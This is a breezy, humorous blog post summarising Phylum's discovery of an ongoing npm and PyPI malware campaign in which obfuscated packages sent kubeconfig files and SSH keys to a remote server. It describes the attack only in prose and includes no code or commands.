The Plot Thickens: A Tale of Sensitive Data Exfiltration
Greetings, cyber sleuths and code wranglers! Buckle up, because we're diving into a story that's got more twists and turns than a JavaScript callback function. Our friends at Phylum have stumbled upon a multi-ecosystem campaign that's sneakier than a ninja in a dark room. This bad boy aims to exfiltrate sensitive machine information to a remote server. And guess what? It's still ongoing! So, let's break it down, shall we?
The Genesis Block: How It All Began
On a seemingly ordinary day, September 12, 2023, Phylum's automated risk detection platform rang the alarm bells. A package with the mysterious name of [REDACTED] appeared on npm and PyPI. It contained just four files, including an obfuscated index.js. Ah, obfuscation, the dark art of making your code look like alphabet soup!
Deobfuscating the file revealed an attempt to exfiltrate sensitive data like kubeconfig files and SSH keys to a remote URL. Over the next two weeks, 46 publications were distributed among 39 distinct packages. It's like the attacker was trying to build the Avengers of malicious packages!
